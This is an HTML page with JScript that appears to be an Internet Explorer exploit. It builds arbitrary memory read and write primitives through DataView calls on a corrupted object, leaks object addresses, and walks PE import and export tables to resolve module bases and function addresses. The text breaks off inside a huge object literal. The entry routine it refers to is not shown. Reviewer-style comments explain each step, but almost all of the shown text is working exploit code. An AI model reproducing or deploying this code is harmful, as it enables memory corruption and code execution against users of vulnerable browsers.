<meta http-equiv="x-ua-compatible" content="IE=10">
<script language='javascript'>
// Page-level state shared by every helper below; the addresses are filled in by main().
// Detection note for reviewers: this page combines a VBScript Class_Terminate callback
// into JScript (ff), DataView.prototype.* calls on a shared receiver (dv), and PE-header
// constants in script (0x3c, 0x78/0x80, 0x5a4d) — all of which are visible below.
var a= [1,2,3];
// Sixteen-slot array; setDataAddress() writes index 7 (0x1c / 4) and main() fills indices 0-7.
var ga = new Array(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0);
var ga_addr = 0;
// Three-element object array; leakObjectAddress() stores its argument in fo[0].
var fo = new Array({},{},{});
// func() copies arr[1] and arr[2] into u32[0] and u32[1]; main() reads them back as ga_addr and fo_addr.
var u32 = new Uint32Array(10);
var dv_addr = 0, fo_addr = 0;
// Set to a[0] in main(); every read*/write* helper passes it as the receiver of a DataView.prototype.* call.
var dv;
// Set to a in main(); ff() assigns ggg[0].
var ggg;
// Loop-exit flag: func() returns early while it is false; ff() and the final script set it to true.
var stop = false;
// Stores addr into ga[7] (index 0x1c / 4). Values at or above 0x80000000 are first
// converted to the equivalent negative 32-bit integer (two's complement), so the slot
// always holds a value representable as a signed 32-bit int.
function setDataAddress(addr)
{
if (addr >= 0x80000000) {
addr = -(0x100000000 - addr);
}
ga[0x1c / 4] = addr;
}
// Positions the shared slot via setDataAddress(addr), then reads one byte at offset 0
// through dv. getUint8 takes no endianness argument; the trailing `true` is ignored.
function read8(addr)
{
setDataAddress(addr);
return DataView.prototype.getUint8.call(dv, 0, true);
}
// Positions the shared slot via setDataAddress(addr), then reads a little-endian
// 16-bit value at offset 0 through dv.
function read16(addr)
{
setDataAddress(addr);
return DataView.prototype.getUint16.call(dv, 0, true);
}
// Positions the shared slot via setDataAddress(addr), then reads a little-endian
// 32-bit value at offset 0 through dv. Returns an unsigned number (0..0xffffffff).
function read32(addr)
{
setDataAddress(addr);
return DataView.prototype.getUint32.call(dv, 0, true);
}
// Alias of read32(): pointers on this page are 32-bit values.
function readPointer(addr)
{
return read32(addr);
}
// Writes the UTF-16 code units of s, followed by a terminating 0, starting at addr
// via writeBytes(). Code units above 0xff are not representable as one byte; writeBytes()
// keeps only their low byte.
function writeString(addr, s) {
var bytes = [];
var i = 0;
for ( ; i < s.length; ++ i ) {
bytes[i] = s.charCodeAt(i);
}
// `i` equals s.length here, so this appends the NUL terminator.
bytes[i] = 0;
writeBytes( addr, bytes );
}
// Writes bytes[] at addr: whole groups of four are packed into a little-endian 32-bit
// word and stored with write32(); the remaining 0-3 bytes go through write8().
function writeBytes(addr, bytes) {
// `var i` is function-scoped, so the second loop resumes where this one stops.
for ( var i = 0; i + 3 < bytes.length; i += 4 ) {
// `<< 24` can yield a negative JS number when bytes[i+3] >= 0x80; setUint32 converts
// the value modulo 2^32, so the stored bit pattern is still correct.
var value = (bytes[i] & 0xff) | ((bytes[i+1] & 0xff) << 8) |
((bytes[i + 2] & 0xff) << 16) | ((bytes[i + 3] & 0xff) << 24);
write32( addr + i, value );
}
for ( ; i < bytes.length; ++ i ) {
write8( addr + i, bytes[i] );
}
}
// Positions the shared slot via setDataAddress(addr), then stores v as one byte at
// offset 0 through dv. setUint8 takes no endianness argument (the trailing `true` is
// ignored) and stores v modulo 256.
function write8(addr, v)
{
setDataAddress(addr);
DataView.prototype.setUint8.call(dv, 0, v, true);
}
// Positions the shared slot via setDataAddress(addr), then stores v as a little-endian
// 32-bit value at offset 0 through dv (v is converted modulo 2^32).
function write32(addr, v)
{
setDataAddress(addr);
DataView.prototype.setUint32.call(dv, 0, v, true);
}
// Alias of write32(): pointers on this page are 32-bit values. Not called elsewhere on this page.
function writePointer(addr, v)
{
write32(addr, v);
}
// Stores o in fo[0] and returns the 32-bit value found at fo_addr + 0x38 (fo_addr is
// set by main() from u32[1]). Callers treat the result as the address of o; that
// fo_addr + 0x38 is where fo[0]'s slot lives cannot be confirmed from this file.
function leakObjectAddress(o)
{
fo[0] = o;
return readPointer(fo_addr + 0x38);
}
// Returns true when the s.length bytes at addr equal the corresponding UTF-16 code units
// of s (a code unit above 0xff can never match a read8() result). Nothing is checked
// after the compared span, so this is a prefix match: a longer string at addr that
// starts with s also compares equal.
function strequal(addr, s) {
for ( var i = 0; i < s.length; ++ i ) {
if ( read8(addr + i) != s.charCodeAt(i) )
return false;
}
return true;
}
// Walks the import descriptor table of the PE image at base and returns the image base
// of the module whose descriptor name matches `name`, or 0 if none is found within
// 0x1000 bytes of the table start. Offsets used:
//   base + 0x3c        : DOS-header field holding the PE header offset (e_lfanew)
//   PE header + 0x80   : data-directory entry for the import table (PE32 layout)
//   descriptor + 12/16 : Name RVA / FirstThunk (IAT) RVA; descriptors are 20 bytes apart
function getModuleBaseFromIAT(base, name) {
var import_table_offset = read32( base + read32(base + 0x3c) + 0x80 );
var import_table = base + import_table_offset;
var cur_table = import_table;
// Bounded by size, not by the all-zero terminating descriptor, so the scan can run past
// the real table; a zero Name RVA then makes name_addr == base.
while ( cur_table < import_table + 0x1000 ) {
var name_addr = base + read32(cur_table + 12);
// strequal() compares only name.length bytes, so 'KERNEL32' also matches 'KERNEL32.dll'.
if ( strequal( name_addr, name ) ) {
var iat = base + read32(cur_table + 16);
var func = readPointer(iat);
// Skip zero IAT slots until a non-zero entry is found (no upper bound on this loop).
while ( 0 == func ) {
iat += 4;
func = readPointer(iat);
}
// The first non-zero IAT entry is taken as an address inside the named module.
return getModuleBase( func );
}
cur_table += 20;
}
return 0;
}
// Looks up procname in the export directory of the PE image at base and returns its
// absolute address, or 0 if no exported name matches. Offsets used:
//   PE header + 0x78        : data-directory entry for the export table (PE32 layout)
//   export dir + 20         : NumberOfFunctions (see note below)
//   export dir + 28/32/36   : AddressOfFunctions / AddressOfNames / AddressOfNameOrdinals
function getProcAddress(base, procname) {
var export_table = base + read32( base + read32(base + 0x3c) + 0x78 );
// The commented-out 0x88 variant matches the export-table position in a PE32+ optional header.
//var export_table = base + read32( base + read32(base + 0x3c) + 0x88 );
// NOTE(review): offset 20 is NumberOfFunctions, but the loop below indexes the name and
// ordinal tables, whose length is NumberOfNames (offset 24). When the two counts differ
// the loop reads beyond the end of the name table.
var num_functions = read32( export_table + 20 );
var addr_functions = base + read32( export_table + 28 );
var addr_names = base + read32( export_table + 32 );
var addr_ordinals = base + read32( export_table + 36 );
for ( var i = 0; i < num_functions; ++ i ) {
var name_addr = read32( addr_names + i * 4 ) + base;
// strequal() is a prefix comparison, so procname also matches longer export names.
if ( strequal( name_addr, procname ) ) {
var ordinal = read16( addr_ordinals + i * 2 );
var result = read32( addr_functions + ordinal * 4 ) + base;
return result;
}
}
return 0;
}
// Rounds addr down to a 64 KiB boundary and scans downward in 64 KiB steps until the
// low 16 bits of the word at the candidate equal 0x5a4d ('MZ', the DOS header magic);
// returns that candidate, or 0 if the scan reaches address 0. Every step performs a
// read32() at the candidate address; nothing here checks whether it is mapped.
function getModuleBase(addr) {
if ( addr % 0x10000 ) {
addr = addr - (addr % 0x10000);
}
var cur_addr = addr;
while ( cur_addr > 0 ) {
if ( (read32(cur_addr) & 0xffff) == 0x5a4d ) {
return cur_addr;
}
cur_addr -= 0x10000;
}
return 0;
}
// Called in a loop from main() as func(a, a) (so arr and a2 are the same array) and from
// the final script as func(a, [{}, {}]). Builds a large object literal (p0..p2866, all 1)
// that is never read afterwards — presumably kept for its allocation side effect; not
// verifiable from this file. Returns early while the global `stop` is false.
function func(arr, a2) {
arr[0] = 1;
var bb = {p0:1,p1:1,p2:1,p3:1,p4:1,p5:1,p6:1,p7:1,p8:1,p9:1,p10:1,p11:1,p12:1,p13:1,p14:1,p15:1,p16:1,p17:1,p18:1,p19:1,p20:1,p21:1,p22:1,p23:1,p24:1,p25:1,p26:1,p27:1,p28:1,p29:1,p30:1,p31:1,p32:1,p33:1,p34:1,p35:1,p36:1,p37:1,p38:1,p39:1,p40:1,p41:1,p42:1,p43:1,p44:1,p45:1,p46:1,p47:1,p48:1,p49:1,p50:1,p51:1,p52:1,p53:1,p54:1,p55:1,p56:1,p57:1,p58:1,p59:1,p60:1,p61:1,p62:1,p63:1,p64:1,p65:1,p66:1,p67:1,p68:1,p69:1,p70:1,p71:1,p72:1,p73:1,p74:1,p75:1,p76:1,p77:1,p78:1,p79:1,p80:1,p81:1,p82:1,p83:1,p84:1,p85:1,p86:1,p87:1,p88:1,p89:1,p90:1,p91:1,p92:1,p93:1,p94:1,p95:1,p96:1,p97:1,p98:1,p99:1,
p100:1,p101:1,p102:1,p103:1,p104:1,p105:1,p106:1,p107:1,p108:1,p109:1,p110:1,p111:1,p112:1,p113:1,p114:1,p115:1,p116:1,p117:1,p118:1,p119:1,p120:1,p121:1,p122:1,p123:1,p124:1,p125:1,p126:1,p127:1,p128:1,p129:1,p130:1,p131:1,p132:1,p133:1,p134:1,p135:1,p136:1,p137:1,p138:1,p139:1,p140:1,p141:1,p142:1,p143:1,p144:1,p145:1,p146:1,p147:1,p148:1,p149:1,p150:1,p151:1,p152:1,p153:1,p154:1,p155:1,p156:1,p157:1,p158:1,p159:1,p160:1,p161:1,p162:1,p163:1,p164:1,p165:1,p166:1,p167:1,p168:1,p169:1,p170:1,p171:1,p172:1,p173:1,p174:1,p175:1,p176:1,p177:1,p178:1,p179:1,p180:1,p181:1,p182:1,p183:1,p184:1,p185:1,p186:1,p187:1,p188:1,p189:1,p190:1,p191:1,p192:1,p193:1,p194:1,p195:1,p196:1,p197:1,p198:1,p199:1,
p200:1,p201:1,p202:1,p203:1,p204:1,p205:1,p206:1,p207:1,p208:1,p209:1,p210:1,p211:1,p212:1,p213:1,p214:1,p215:1,p216:1,p217:1,p218:1,p219:1,p220:1,p221:1,p222:1,p223:1,p224:1,p225:1,p226:1,p227:1,p228:1,p229:1,p230:1,p231:1,p232:1,p233:1,p234:1,p235:1,p236:1,p237:1,p238:1,p239:1,p240:1,p241:1,p242:1,p243:1,p244:1,p245:1,p246:1,p247:1,p248:1,p249:1,p250:1,p251:1,p252:1,p253:1,p254:1,p255:1,p256:1,p257:1,p258:1,p259:1,p260:1,p261:1,p262:1,p263:1,p264:1,p265:1,p266:1,p267:1,p268:1,p269:1,p270:1,p271:1,p272:1,p273:1,p274:1,p275:1,p276:1,p277:1,p278:1,p279:1,p280:1,p281:1,p282:1,p283:1,p284:1,p285:1,p286:1,p287:1,p288:1,p289:1,p290:1,p291:1,p292:1,p293:1,p294:1,p295:1,p296:1,p297:1,p298:1,p299:1,
p300:1,p301:1,p302:1,p303:1,p304:1,p305:1,p306:1,p307:1,p308:1,p309:1,p310:1,p311:1,p312:1,p313:1,p314:1,p315:1,p316:1,p317:1,p318:1,p319:1,p320:1,p321:1,p322:1,p323:1,p324:1,p325:1,p326:1,p327:1,p328:1,p329:1,p330:1,p331:1,p332:1,p333:1,p334:1,p335:1,p336:1,p337:1,p338:1,p339:1,p340:1,p341:1,p342:1,p343:1,p344:1,p345:1,p346:1,p347:1,p348:1,p349:1,p350:1,p351:1,p352:1,p353:1,p354:1,p355:1,p356:1,p357:1,p358:1,p359:1,p360:1,p361:1,p362:1,p363:1,p364:1,p365:1,p366:1,p367:1,p368:1,p369:1,p370:1,p371:1,p372:1,p373:1,p374:1,p375:1,p376:1,p377:1,p378:1,p379:1,p380:1,p381:1,p382:1,p383:1,p384:1,p385:1,p386:1,p387:1,p388:1,p389:1,p390:1,p391:1,p392:1,p393:1,p394:1,p395:1,p396:1,p397:1,p398:1,p399:1,
p400:1,p401:1,p402:1,p403:1,p404:1,p405:1,p406:1,p407:1,p408:1,p409:1,p410:1,p411:1,p412:1,p413:1,p414:1,p415:1,p416:1,p417:1,p418:1,p419:1,p420:1,p421:1,p422:1,p423:1,p424:1,p425:1,p426:1,p427:1,p428:1,p429:1,p430:1,p431:1,p432:1,p433:1,p434:1,p435:1,p436:1,p437:1,p438:1,p439:1,p440:1,p441:1,p442:1,p443:1,p444:1,p445:1,p446:1,p447:1,p448:1,p449:1,p450:1,p451:1,p452:1,p453:1,p454:1,p455:1,p456:1,p457:1,p458:1,p459:1,p460:1,p461:1,p462:1,p463:1,p464:1,p465:1,p466:1,p467:1,p468:1,p469:1,p470:1,p471:1,p472:1,p473:1,p474:1,p475:1,p476:1,p477:1,p478:1,p479:1,p480:1,p481:1,p482:1,p483:1,p484:1,p485:1,p486:1,p487:1,p488:1,p489:1,p490:1,p491:1,p492:1,p493:1,p494:1,p495:1,p496:1,p497:1,p498:1,p499:1,
p500:1,p501:1,p502:1,p503:1,p504:1,p505:1,p506:1,p507:1,p508:1,p509:1,p510:1,p511:1,p512:1,p513:1,p514:1,p515:1,p516:1,p517:1,p518:1,p519:1,p520:1,p521:1,p522:1,p523:1,p524:1,p525:1,p526:1,p527:1,p528:1,p529:1,p530:1,p531:1,p532:1,p533:1,p534:1,p535:1,p536:1,p537:1,p538:1,p539:1,p540:1,p541:1,p542:1,p543:1,p544:1,p545:1,p546:1,p547:1,p548:1,p549:1,p550:1,p551:1,p552:1,p553:1,p554:1,p555:1,p556:1,p557:1,p558:1,p559:1,p560:1,p561:1,p562:1,p563:1,p564:1,p565:1,p566:1,p567:1,p568:1,p569:1,p570:1,p571:1,p572:1,p573:1,p574:1,p575:1,p576:1,p577:1,p578:1,p579:1,p580:1,p581:1,p582:1,p583:1,p584:1,p585:1,p586:1,p587:1,p588:1,p589:1,p590:1,p591:1,p592:1,p593:1,p594:1,p595:1,p596:1,p597:1,p598:1,p599:1,
p600:1,p601:1,p602:1,p603:1,p604:1,p605:1,p606:1,p607:1,p608:1,p609:1,p610:1,p611:1,p612:1,p613:1,p614:1,p615:1,p616:1,p617:1,p618:1,p619:1,p620:1,p621:1,p622:1,p623:1,p624:1,p625:1,p626:1,p627:1,p628:1,p629:1,p630:1,p631:1,p632:1,p633:1,p634:1,p635:1,p636:1,p637:1,p638:1,p639:1,p640:1,p641:1,p642:1,p643:1,p644:1,p645:1,p646:1,p647:1,p648:1,p649:1,p650:1,p651:1,p652:1,p653:1,p654:1,p655:1,p656:1,p657:1,p658:1,p659:1,p660:1,p661:1,p662:1,p663:1,p664:1,p665:1,p666:1,p667:1,p668:1,p669:1,p670:1,p671:1,p672:1,p673:1,p674:1,p675:1,p676:1,p677:1,p678:1,p679:1,p680:1,p681:1,p682:1,p683:1,p684:1,p685:1,p686:1,p687:1,p688:1,p689:1,p690:1,p691:1,p692:1,p693:1,p694:1,p695:1,p696:1,p697:1,p698:1,p699:1,
p700:1,p701:1,p702:1,p703:1,p704:1,p705:1,p706:1,p707:1,p708:1,p709:1,p710:1,p711:1,p712:1,p713:1,p714:1,p715:1,p716:1,p717:1,p718:1,p719:1,p720:1,p721:1,p722:1,p723:1,p724:1,p725:1,p726:1,p727:1,p728:1,p729:1,p730:1,p731:1,p732:1,p733:1,p734:1,p735:1,p736:1,p737:1,p738:1,p739:1,p740:1,p741:1,p742:1,p743:1,p744:1,p745:1,p746:1,p747:1,p748:1,p749:1,p750:1,p751:1,p752:1,p753:1,p754:1,p755:1,p756:1,p757:1,p758:1,p759:1,p760:1,p761:1,p762:1,p763:1,p764:1,p765:1,p766:1,p767:1,p768:1,p769:1,p770:1,p771:1,p772:1,p773:1,p774:1,p775:1,p776:1,p777:1,p778:1,p779:1,p780:1,p781:1,p782:1,p783:1,p784:1,p785:1,p786:1,p787:1,p788:1,p789:1,p790:1,p791:1,p792:1,p793:1,p794:1,p795:1,p796:1,p797:1,p798:1,p799:1,
p800:1,p801:1,p802:1,p803:1,p804:1,p805:1,p806:1,p807:1,p808:1,p809:1,p810:1,p811:1,p812:1,p813:1,p814:1,p815:1,p816:1,p817:1,p818:1,p819:1,p820:1,p821:1,p822:1,p823:1,p824:1,p825:1,p826:1,p827:1,p828:1,p829:1,p830:1,p831:1,p832:1,p833:1,p834:1,p835:1,p836:1,p837:1,p838:1,p839:1,p840:1,p841:1,p842:1,p843:1,p844:1,p845:1,p846:1,p847:1,p848:1,p849:1,p850:1,p851:1,p852:1,p853:1,p854:1,p855:1,p856:1,p857:1,p858:1,p859:1,p860:1,p861:1,p862:1,p863:1,p864:1,p865:1,p866:1,p867:1,p868:1,p869:1,p870:1,p871:1,p872:1,p873:1,p874:1,p875:1,p876:1,p877:1,p878:1,p879:1,p880:1,p881:1,p882:1,p883:1,p884:1,p885:1,p886:1,p887:1,p888:1,p889:1,p890:1,p891:1,p892:1,p893:1,p894:1,p895:1,p896:1,p897:1,p898:1,p899:1,
p900:1,p901:1,p902:1,p903:1,p904:1,p905:1,p906:1,p907:1,p908:1,p909:1,p910:1,p911:1,p912:1,p913:1,p914:1,p915:1,p916:1,p917:1,p918:1,p919:1,p920:1,p921:1,p922:1,p923:1,p924:1,p925:1,p926:1,p927:1,p928:1,p929:1,p930:1,p931:1,p932:1,p933:1,p934:1,p935:1,p936:1,p937:1,p938:1,p939:1,p940:1,p941:1,p942:1,p943:1,p944:1,p945:1,p946:1,p947:1,p948:1,p949:1,p950:1,p951:1,p952:1,p953:1,p954:1,p955:1,p956:1,p957:1,p958:1,p959:1,p960:1,p961:1,p962:1,p963:1,p964:1,p965:1,p966:1,p967:1,p968:1,p969:1,p970:1,p971:1,p972:1,p973:1,p974:1,p975:1,p976:1,p977:1,p978:1,p979:1,p980:1,p981:1,p982:1,p983:1,p984:1,p985:1,p986:1,p987:1,p988:1,p989:1,p990:1,p991:1,p992:1,p993:1,p994:1,p995:1,p996:1,p997:1,p998:1,p999:1,
p1000:1,p1001:1,p1002:1,p1003:1,p1004:1,p1005:1,p1006:1,p1007:1,p1008:1,p1009:1,p1010:1,p1011:1,p1012:1,p1013:1,p1014:1,p1015:1,p1016:1,p1017:1,p1018:1,p1019:1,p1020:1,p1021:1,p1022:1,p1023:1,p1024:1,p1025:1,p1026:1,p1027:1,p1028:1,p1029:1,p1030:1,p1031:1,p1032:1,p1033:1,p1034:1,p1035:1,p1036:1,p1037:1,p1038:1,p1039:1,p1040:1,p1041:1,p1042:1,p1043:1,p1044:1,p1045:1,p1046:1,p1047:1,p1048:1,p1049:1,p1050:1,p1051:1,p1052:1,p1053:1,p1054:1,p1055:1,p1056:1,p1057:1,p1058:1,p1059:1,p1060:1,p1061:1,p1062:1,p1063:1,p1064:1,p1065:1,p1066:1,p1067:1,p1068:1,p1069:1,p1070:1,p1071:1,p1072:1,p1073:1,p1074:1,p1075:1,p1076:1,p1077:1,p1078:1,p1079:1,p1080:1,p1081:1,p1082:1,p1083:1,p1084:1,p1085:1,p1086:1,p1087:1,p1088:1,p1089:1,p1090:1,p1091:1,p1092:1,p1093:1,p1094:1,p1095:1,p1096:1,p1097:1,p1098:1,p1099:1,
p1100:1,p1101:1,p1102:1,p1103:1,p1104:1,p1105:1,p1106:1,p1107:1,p1108:1,p1109:1,p1110:1,p1111:1,p1112:1,p1113:1,p1114:1,p1115:1,p1116:1,p1117:1,p1118:1,p1119:1,p1120:1,p1121:1,p1122:1,p1123:1,p1124:1,p1125:1,p1126:1,p1127:1,p1128:1,p1129:1,p1130:1,p1131:1,p1132:1,p1133:1,p1134:1,p1135:1,p1136:1,p1137:1,p1138:1,p1139:1,p1140:1,p1141:1,p1142:1,p1143:1,p1144:1,p1145:1,p1146:1,p1147:1,p1148:1,p1149:1,p1150:1,p1151:1,p1152:1,p1153:1,p1154:1,p1155:1,p1156:1,p1157:1,p1158:1,p1159:1,p1160:1,p1161:1,p1162:1,p1163:1,p1164:1,p1165:1,p1166:1,p1167:1,p1168:1,p1169:1,p1170:1,p1171:1,p1172:1,p1173:1,p1174:1,p1175:1,p1176:1,p1177:1,p1178:1,p1179:1,p1180:1,p1181:1,p1182:1,p1183:1,p1184:1,p1185:1,p1186:1,p1187:1,p1188:1,p1189:1,p1190:1,p1191:1,p1192:1,p1193:1,p1194:1,p1195:1,p1196:1,p1197:1,p1198:1,p1199:1,
p1200:1,p1201:1,p1202:1,p1203:1,p1204:1,p1205:1,p1206:1,p1207:1,p1208:1,p1209:1,p1210:1,p1211:1,p1212:1,p1213:1,p1214:1,p1215:1,p1216:1,p1217:1,p1218:1,p1219:1,p1220:1,p1221:1,p1222:1,p1223:1,p1224:1,p1225:1,p1226:1,p1227:1,p1228:1,p1229:1,p1230:1,p1231:1,p1232:1,p1233:1,p1234:1,p1235:1,p1236:1,p1237:1,p1238:1,p1239:1,p1240:1,p1241:1,p1242:1,p1243:1,p1244:1,p1245:1,p1246:1,p1247:1,p1248:1,p1249:1,p1250:1,p1251:1,p1252:1,p1253:1,p1254:1,p1255:1,p1256:1,p1257:1,p1258:1,p1259:1,p1260:1,p1261:1,p1262:1,p1263:1,p1264:1,p1265:1,p1266:1,p1267:1,p1268:1,p1269:1,p1270:1,p1271:1,p1272:1,p1273:1,p1274:1,p1275:1,p1276:1,p1277:1,p1278:1,p1279:1,p1280:1,p1281:1,p1282:1,p1283:1,p1284:1,p1285:1,p1286:1,p1287:1,p1288:1,p1289:1,p1290:1,p1291:1,p1292:1,p1293:1,p1294:1,p1295:1,p1296:1,p1297:1,p1298:1,p1299:1,
p1300:1,p1301:1,p1302:1,p1303:1,p1304:1,p1305:1,p1306:1,p1307:1,p1308:1,p1309:1,p1310:1,p1311:1,p1312:1,p1313:1,p1314:1,p1315:1,p1316:1,p1317:1,p1318:1,p1319:1,p1320:1,p1321:1,p1322:1,p1323:1,p1324:1,p1325:1,p1326:1,p1327:1,p1328:1,p1329:1,p1330:1,p1331:1,p1332:1,p1333:1,p1334:1,p1335:1,p1336:1,p1337:1,p1338:1,p1339:1,p1340:1,p1341:1,p1342:1,p1343:1,p1344:1,p1345:1,p1346:1,p1347:1,p1348:1,p1349:1,p1350:1,p1351:1,p1352:1,p1353:1,p1354:1,p1355:1,p1356:1,p1357:1,p1358:1,p1359:1,p1360:1,p1361:1,p1362:1,p1363:1,p1364:1,p1365:1,p1366:1,p1367:1,p1368:1,p1369:1,p1370:1,p1371:1,p1372:1,p1373:1,p1374:1,p1375:1,p1376:1,p1377:1,p1378:1,p1379:1,p1380:1,p1381:1,p1382:1,p1383:1,p1384:1,p1385:1,p1386:1,p1387:1,p1388:1,p1389:1,p1390:1,p1391:1,p1392:1,p1393:1,p1394:1,p1395:1,p1396:1,p1397:1,p1398:1,p1399:1,
p1400:1,p1401:1,p1402:1,p1403:1,p1404:1,p1405:1,p1406:1,p1407:1,p1408:1,p1409:1,p1410:1,p1411:1,p1412:1,p1413:1,p1414:1,p1415:1,p1416:1,p1417:1,p1418:1,p1419:1,p1420:1,p1421:1,p1422:1,p1423:1,p1424:1,p1425:1,p1426:1,p1427:1,p1428:1,p1429:1,p1430:1,p1431:1,p1432:1,p1433:1,p1434:1,p1435:1,p1436:1,p1437:1,p1438:1,p1439:1,p1440:1,p1441:1,p1442:1,p1443:1,p1444:1,p1445:1,p1446:1,p1447:1,p1448:1,p1449:1,p1450:1,p1451:1,p1452:1,p1453:1,p1454:1,p1455:1,p1456:1,p1457:1,p1458:1,p1459:1,p1460:1,p1461:1,p1462:1,p1463:1,p1464:1,p1465:1,p1466:1,p1467:1,p1468:1,p1469:1,p1470:1,p1471:1,p1472:1,p1473:1,p1474:1,p1475:1,p1476:1,p1477:1,p1478:1,p1479:1,p1480:1,p1481:1,p1482:1,p1483:1,p1484:1,p1485:1,p1486:1,p1487:1,p1488:1,p1489:1,p1490:1,p1491:1,p1492:1,p1493:1,p1494:1,p1495:1,p1496:1,p1497:1,p1498:1,p1499:1,
p1500:1,p1501:1,p1502:1,p1503:1,p1504:1,p1505:1,p1506:1,p1507:1,p1508:1,p1509:1,p1510:1,p1511:1,p1512:1,p1513:1,p1514:1,p1515:1,p1516:1,p1517:1,p1518:1,p1519:1,p1520:1,p1521:1,p1522:1,p1523:1,p1524:1,p1525:1,p1526:1,p1527:1,p1528:1,p1529:1,p1530:1,p1531:1,p1532:1,p1533:1,p1534:1,p1535:1,p1536:1,p1537:1,p1538:1,p1539:1,p1540:1,p1541:1,p1542:1,p1543:1,p1544:1,p1545:1,p1546:1,p1547:1,p1548:1,p1549:1,p1550:1,p1551:1,p1552:1,p1553:1,p1554:1,p1555:1,p1556:1,p1557:1,p1558:1,p1559:1,p1560:1,p1561:1,p1562:1,p1563:1,p1564:1,p1565:1,p1566:1,p1567:1,p1568:1,p1569:1,p1570:1,p1571:1,p1572:1,p1573:1,p1574:1,p1575:1,p1576:1,p1577:1,p1578:1,p1579:1,p1580:1,p1581:1,p1582:1,p1583:1,p1584:1,p1585:1,p1586:1,p1587:1,p1588:1,p1589:1,p1590:1,p1591:1,p1592:1,p1593:1,p1594:1,p1595:1,p1596:1,p1597:1,p1598:1,p1599:1,
p1600:1,p1601:1,p1602:1,p1603:1,p1604:1,p1605:1,p1606:1,p1607:1,p1608:1,p1609:1,p1610:1,p1611:1,p1612:1,p1613:1,p1614:1,p1615:1,p1616:1,p1617:1,p1618:1,p1619:1,p1620:1,p1621:1,p1622:1,p1623:1,p1624:1,p1625:1,p1626:1,p1627:1,p1628:1,p1629:1,p1630:1,p1631:1,p1632:1,p1633:1,p1634:1,p1635:1,p1636:1,p1637:1,p1638:1,p1639:1,p1640:1,p1641:1,p1642:1,p1643:1,p1644:1,p1645:1,p1646:1,p1647:1,p1648:1,p1649:1,p1650:1,p1651:1,p1652:1,p1653:1,p1654:1,p1655:1,p1656:1,p1657:1,p1658:1,p1659:1,p1660:1,p1661:1,p1662:1,p1663:1,p1664:1,p1665:1,p1666:1,p1667:1,p1668:1,p1669:1,p1670:1,p1671:1,p1672:1,p1673:1,p1674:1,p1675:1,p1676:1,p1677:1,p1678:1,p1679:1,p1680:1,p1681:1,p1682:1,p1683:1,p1684:1,p1685:1,p1686:1,p1687:1,p1688:1,p1689:1,p1690:1,p1691:1,p1692:1,p1693:1,p1694:1,p1695:1,p1696:1,p1697:1,p1698:1,p1699:1,
p1700:1,p1701:1,p1702:1,p1703:1,p1704:1,p1705:1,p1706:1,p1707:1,p1708:1,p1709:1,p1710:1,p1711:1,p1712:1,p1713:1,p1714:1,p1715:1,p1716:1,p1717:1,p1718:1,p1719:1,p1720:1,p1721:1,p1722:1,p1723:1,p1724:1,p1725:1,p1726:1,p1727:1,p1728:1,p1729:1,p1730:1,p1731:1,p1732:1,p1733:1,p1734:1,p1735:1,p1736:1,p1737:1,p1738:1,p1739:1,p1740:1,p1741:1,p1742:1,p1743:1,p1744:1,p1745:1,p1746:1,p1747:1,p1748:1,p1749:1,p1750:1,p1751:1,p1752:1,p1753:1,p1754:1,p1755:1,p1756:1,p1757:1,p1758:1,p1759:1,p1760:1,p1761:1,p1762:1,p1763:1,p1764:1,p1765:1,p1766:1,p1767:1,p1768:1,p1769:1,p1770:1,p1771:1,p1772:1,p1773:1,p1774:1,p1775:1,p1776:1,p1777:1,p1778:1,p1779:1,p1780:1,p1781:1,p1782:1,p1783:1,p1784:1,p1785:1,p1786:1,p1787:1,p1788:1,p1789:1,p1790:1,p1791:1,p1792:1,p1793:1,p1794:1,p1795:1,p1796:1,p1797:1,p1798:1,p1799:1,
p1800:1,p1801:1,p1802:1,p1803:1,p1804:1,p1805:1,p1806:1,p1807:1,p1808:1,p1809:1,p1810:1,p1811:1,p1812:1,p1813:1,p1814:1,p1815:1,p1816:1,p1817:1,p1818:1,p1819:1,p1820:1,p1821:1,p1822:1,p1823:1,p1824:1,p1825:1,p1826:1,p1827:1,p1828:1,p1829:1,p1830:1,p1831:1,p1832:1,p1833:1,p1834:1,p1835:1,p1836:1,p1837:1,p1838:1,p1839:1,p1840:1,p1841:1,p1842:1,p1843:1,p1844:1,p1845:1,p1846:1,p1847:1,p1848:1,p1849:1,p1850:1,p1851:1,p1852:1,p1853:1,p1854:1,p1855:1,p1856:1,p1857:1,p1858:1,p1859:1,p1860:1,p1861:1,p1862:1,p1863:1,p1864:1,p1865:1,p1866:1,p1867:1,p1868:1,p1869:1,p1870:1,p1871:1,p1872:1,p1873:1,p1874:1,p1875:1,p1876:1,p1877:1,p1878:1,p1879:1,p1880:1,p1881:1,p1882:1,p1883:1,p1884:1,p1885:1,p1886:1,p1887:1,p1888:1,p1889:1,p1890:1,p1891:1,p1892:1,p1893:1,p1894:1,p1895:1,p1896:1,p1897:1,p1898:1,p1899:1,
p1900:1,p1901:1,p1902:1,p1903:1,p1904:1,p1905:1,p1906:1,p1907:1,p1908:1,p1909:1,p1910:1,p1911:1,p1912:1,p1913:1,p1914:1,p1915:1,p1916:1,p1917:1,p1918:1,p1919:1,p1920:1,p1921:1,p1922:1,p1923:1,p1924:1,p1925:1,p1926:1,p1927:1,p1928:1,p1929:1,p1930:1,p1931:1,p1932:1,p1933:1,p1934:1,p1935:1,p1936:1,p1937:1,p1938:1,p1939:1,p1940:1,p1941:1,p1942:1,p1943:1,p1944:1,p1945:1,p1946:1,p1947:1,p1948:1,p1949:1,p1950:1,p1951:1,p1952:1,p1953:1,p1954:1,p1955:1,p1956:1,p1957:1,p1958:1,p1959:1,p1960:1,p1961:1,p1962:1,p1963:1,p1964:1,p1965:1,p1966:1,p1967:1,p1968:1,p1969:1,p1970:1,p1971:1,p1972:1,p1973:1,p1974:1,p1975:1,p1976:1,p1977:1,p1978:1,p1979:1,p1980:1,p1981:1,p1982:1,p1983:1,p1984:1,p1985:1,p1986:1,p1987:1,p1988:1,p1989:1,p1990:1,p1991:1,p1992:1,p1993:1,p1994:1,p1995:1,p1996:1,p1997:1,p1998:1,p1999:1,
